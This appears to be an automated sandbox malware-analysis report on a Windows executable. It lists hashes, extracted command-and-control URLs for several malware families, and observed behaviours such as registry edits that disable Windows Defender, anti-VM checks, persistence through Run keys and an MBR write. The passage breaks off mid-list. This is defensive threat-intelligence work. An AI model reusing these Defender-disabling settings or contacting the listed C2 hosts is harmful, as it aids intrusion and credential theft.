Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
02/04/2025, 15:02
Static task
static1
Behavioral task
behavioral1
Sample
2025-04-02_e9c3720b101e469f261fe20e246e3e97_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win10v2004-20250314-en
General
-
Target
2025-04-02_e9c3720b101e469f261fe20e246e3e97_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
-
Size
938KB
-
MD5
e9c3720b101e469f261fe20e246e3e97
-
SHA1
085847380cebb6beab8324221429deb9164b904b
-
SHA256
a6334a19d5f77be548a00862a4c9b5f0863575a2cd42e3a43aae2a8ab4280f55
-
SHA512
0b751fc5908808ffd0fc9b0a22908d8aa9599aedfbd71460a676dcab58365afaf9876895db2ea85c509fd606523189d2e9d7d6956cc9640ae1551c635e77e84d
-
SSDEEP
24576:kqDEvCTbMWu7rQYlBQcBiT6rprG8a0zu:kTvC/MTQYxsWR7a0z
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://rodformi.run/aUosoz
https://metalsyo.digital/opsa
https://iqironloxp.live/aksdd
https://navstarx.shop/FoaJSi
https://starcloc.bet/GOksAo
https://madvennture.top/GKsiio
https://targett.top/dsANGt
https://qspacedbv.world/EKdlsk
https://igalxnetb.today/GsuIAo
https://hcosmosyf.top/GOsznj
https://ironloxp.live/aksdd
https://hywnnavstarx.shop/FoaJSi
https://advennture.top/GKsiio
https://spacedbv.world/EKdlsk
https://galxnetb.today/GsuIAo
https://hadvennture.top/GKsiio
https://wstarcloc.bet/GOksAo
https://atargett.top/dsANGt
Extracted
darkvision
82.29.67.160
-
url
http://107.174.192.179/data/003
https://grabify.link/ZATFQO
http://107.174.192.179/clean
-
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Signatures
-
Amadey family
-
DarkVision Rat
DarkVision Rat is a trojan written in C++.
-
Darkvision family
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/memory/4704-610-0x0000000000D10000-0x0000000001144000-memory.dmp healer behavioral1/memory/4704-609-0x0000000000D10000-0x0000000001144000-memory.dmp healer behavioral1/memory/4704-674-0x0000000000D10000-0x0000000001144000-memory.dmp healer -
Healer family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" 53e64105fd.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection 53e64105fd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 53e64105fd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 53e64105fd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 53e64105fd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 53e64105fd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 53e64105fd.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 53e64105fd.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications 53e64105fd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" 53e64105fd.exe -
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security reg.exe -
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 2 IoCs
resource yara_rule behavioral1/files/0x00080000000242b0-100.dat family_stormkitty behavioral1/memory/3736-113-0x00000000002C0000-0x00000000002FC000-memory.dmp family_stormkitty -
Stormkitty family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 53e64105fd.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ac5082e7c9.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempDSHHSITETI0IHLQ1CZ0GDXHTYQYHP1FI.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2c8d23ef22.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 6 5200 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 5200 powershell.exe 4228 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 15 IoCs
flow pid Process 253 4052 rapes.exe 293 4052 rapes.exe 293 4052 rapes.exe 6 5200 powershell.exe 32 4052 rapes.exe 32 4052 rapes.exe 32 4052 rapes.exe 32 4052 rapes.exe 32 4052 rapes.exe 32 4052 rapes.exe 32 4052 rapes.exe 32 4052 rapes.exe 32 4052 rapes.exe 32 4052 rapes.exe 180 4376 svchost.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File created C:\Windows\System32\Drivers\4e6f50f4.sys 5a11d930.exe File created C:\Windows\System32\Drivers\klupd_4e6f50f4a_arkmon.sys 5a11d930.exe File created C:\Windows\System32\Drivers\klupd_4e6f50f4a_klbg.sys 5a11d930.exe -
Possible privilege escalation attempt 2 IoCs
pid Process 5796 icacls.exe 1716 takeown.exe -
Sets service image path in registry 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\4e6f50f4\ImagePath = "System32\\Drivers\\4e6f50f4.sys" 5a11d930.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_4e6f50f4a_arkmon\ImagePath = "System32\\Drivers\\klupd_4e6f50f4a_arkmon.sys" 5a11d930.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_4e6f50f4a_klbg\ImagePath = "System32\\Drivers\\klupd_4e6f50f4a_klbg.sys" 5a11d930.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_4e6f50f4a_klark\ImagePath = "System32\\Drivers\\klupd_4e6f50f4a_klark.sys" 5a11d930.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_4e6f50f4a_mark\ImagePath = "System32\\Drivers\\klupd_4e6f50f4a_mark.sys" 5a11d930.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_4e6f50f4a_arkmon_7C924DD4\ImagePath = "\\??\\C:\\KVRT2020_Data\\Temp\\7C924DD4D20055C80007791130E2D03F\\klupd_4e6f50f4a_arkmon.sys" 5a11d930.exe -
Stops running service(s) 4 TTPs
-
Checks BIOS information in registry 2 TTPs 16 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ddb314f467.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 53e64105fd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempDSHHSITETI0IHLQ1CZ0GDXHTYQYHP1FI.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempDSHHSITETI0IHLQ1CZ0GDXHTYQYHP1FI.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2c8d23ef22.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ddb314f467.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 53e64105fd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ac5082e7c9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ac5082e7c9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2c8d23ef22.exe -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation TempDSHHSITETI0IHLQ1CZ0GDXHTYQYHP1FI.EXE Key value queried \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation apple.exe Key value queried \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation 261.exe Key value queried \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation 261.exe Key value queried \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation 7IIl2eE.exe -
Deletes itself 1 IoCs
pid Process 2732 w32tm.exe -
Executes dropped EXE 26 IoCs
pid Process 3068 TempDSHHSITETI0IHLQ1CZ0GDXHTYQYHP1FI.EXE 4052 rapes.exe 4428 apple.exe 1000 261.exe 2368 261.exe 5352 3sZiUQa.exe 3736 KXtPusH.exe 448 2c8d23ef22.exe 4660 rapes.exe 3204 ddb314f467.exe 5300 cab1283345.exe 4704 53e64105fd.exe 4672 f5cd7caa1f.exe 2220 176117a9a6.exe 5996 Rm3cVPI.exe 3228 UZPt0hR.exe 1620 qWR3lUj.exe 5300 tzutil.exe 2732 w32tm.exe 5072 rapes.exe 2356 ac5082e7c9.exe 6488 7IIl2eE.exe 6436 5969479a.exe 7864 5a11d930.exe 8784 h8NlU62.exe 10944 Passwords.com -
Identifies Wine through registry keys 2 TTPs 7 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine TempDSHHSITETI0IHLQ1CZ0GDXHTYQYHP1FI.EXE Key opened \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine 2c8d23ef22.exe Key opened \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine 53e64105fd.exe Key opened \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine ac5082e7c9.exe -
Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\4e6f50f4.sys 5a11d930.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\4e6f50f4.sys\ = "Driver" 5a11d930.exe -
Loads dropped DLL 26 IoCs
pid Process 7864 5a11d930.exe 7864 5a11d930.exe 7864 5a11d930.exe 7864 5a11d930.exe 7864 5a11d930.exe 7864 5a11d930.exe 7864 5a11d930.exe 7864 5a11d930.exe 7864 5a11d930.exe 7864 5a11d930.exe 7864 5a11d930.exe 7864 5a11d930.exe 7864 5a11d930.exe 7864 5a11d930.exe 7864 5a11d930.exe 7864 5a11d930.exe 7864 5a11d930.exe 7864 5a11d930.exe 7864 5a11d930.exe 7864 5a11d930.exe 7864 5a11d930.exe 7864 5a11d930.exe 7864 5a11d930.exe 7864 5a11d930.exe 7864 5a11d930.exe 7864 5a11d930.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 1716 takeown.exe 5796 icacls.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 53e64105fd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 53e64105fd.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 KXtPusH.exe Key opened \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 KXtPusH.exe Key opened \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 KXtPusH.exe -
Adds Run key to start application 2 TTPs 7 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cab1283345.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10419570101\\cab1283345.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\53e64105fd.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10419580101\\53e64105fd.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\17c00725-0351-4b58-b404-eed076931aba = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\{1ecfb85f-c304-4da8-be54-74c3b8a8fa08}\\17c00725-0351-4b58-b404-eed076931aba.cmd\"" 5a11d930.exe Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\2c8d23ef22.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10419550101\\2c8d23ef22.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ddb314f467.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10419560101\\ddb314f467.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 49 ipinfo.io 50 ipinfo.io 342 ipinfo.io 343 ipinfo.io -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 5a11d930.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x00080000000242da-197.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 10000 tasklist.exe 10320 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
pid Process 3068 TempDSHHSITETI0IHLQ1CZ0GDXHTYQYHP1FI.EXE 4052 rapes.exe 448 2c8d23ef22.exe 4660 rapes.exe 4704 53e64105fd.exe 5072 rapes.exe 2356 ac5082e7c9.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 4672 set thread context of 4060 4672 f5cd7caa1f.exe 224 PID 1620 set thread context of 1200 1620 qWR3lUj.exe 238 PID 8784 set thread context of 8808 8784 h8NlU62.exe 258 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN 5969479a.exe File opened (read-only) \??\VBoxMiniRdrDN 5a11d930.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe -
Drops file in Windows directory 14 IoCs
description ioc Process File opened for modification C:\Windows\WallpapersHo 7IIl2eE.exe File opened for modification C:\Windows\BrandonStat 7IIl2eE.exe File opened for modification C:\Windows\CorrectionsGeographic 7IIl2eE.exe File opened for modification C:\Windows\RowTopics 7IIl2eE.exe File opened for modification C:\Windows\DiscussedFacial 7IIl2eE.exe File opened for modification C:\Windows\LogisticsNotre 7IIl2eE.exe File opened for modification C:\Windows\ProvidingMilwaukee 7IIl2eE.exe File opened for modification C:\Windows\EstateLegislative 7IIl2eE.exe File opened for modification C:\Windows\JenniferSubdivision 7IIl2eE.exe File opened for modification C:\Windows\EnglandDeleted 7IIl2eE.exe File opened for modification C:\Windows\PotteryUser 7IIl2eE.exe File opened for modification C:\Windows\SpecificsHeaven 7IIl2eE.exe File opened for modification C:\Windows\GentleLogging 7IIl2eE.exe File created C:\Windows\Tasks\rapes.job TempDSHHSITETI0IHLQ1CZ0GDXHTYQYHP1FI.EXE -
Launches sc.exe 38 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3156 sc.exe 4080 sc.exe 2780 sc.exe 1956 sc.exe 1292 sc.exe 5328 sc.exe 1356 sc.exe 2272 sc.exe 2200 sc.exe 5492 sc.exe 4088 sc.exe 2260 sc.exe 5652 sc.exe 2592 sc.exe 5692 sc.exe 5360 sc.exe 4928 sc.exe 3284 sc.exe 1740 sc.exe 4424 sc.exe 448 sc.exe 3580 sc.exe 5948 sc.exe 2884 sc.exe 5804 sc.exe 5512 sc.exe 4892 sc.exe 1840 sc.exe 2960 sc.exe 856 sc.exe 1272 sc.exe 5864 sc.exe 2384 sc.exe 6064 sc.exe 3400 sc.exe 3008 sc.exe 2744 sc.exe 4820 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
Program crash 2 IoCs
pid pid_target Process procid_target 580 3736 WerFault.exe 178 8360 7392 WerFault.exe 372 -
System Location Discovery: System Language Discovery 1 TTPs 50 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rm3cVPI.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Passwords.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempDSHHSITETI0IHLQ1CZ0GDXHTYQYHP1FI.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 261.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cab1283345.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language cab1283345.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language UZPt0hR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ac5082e7c9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language apple.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 176117a9a6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened 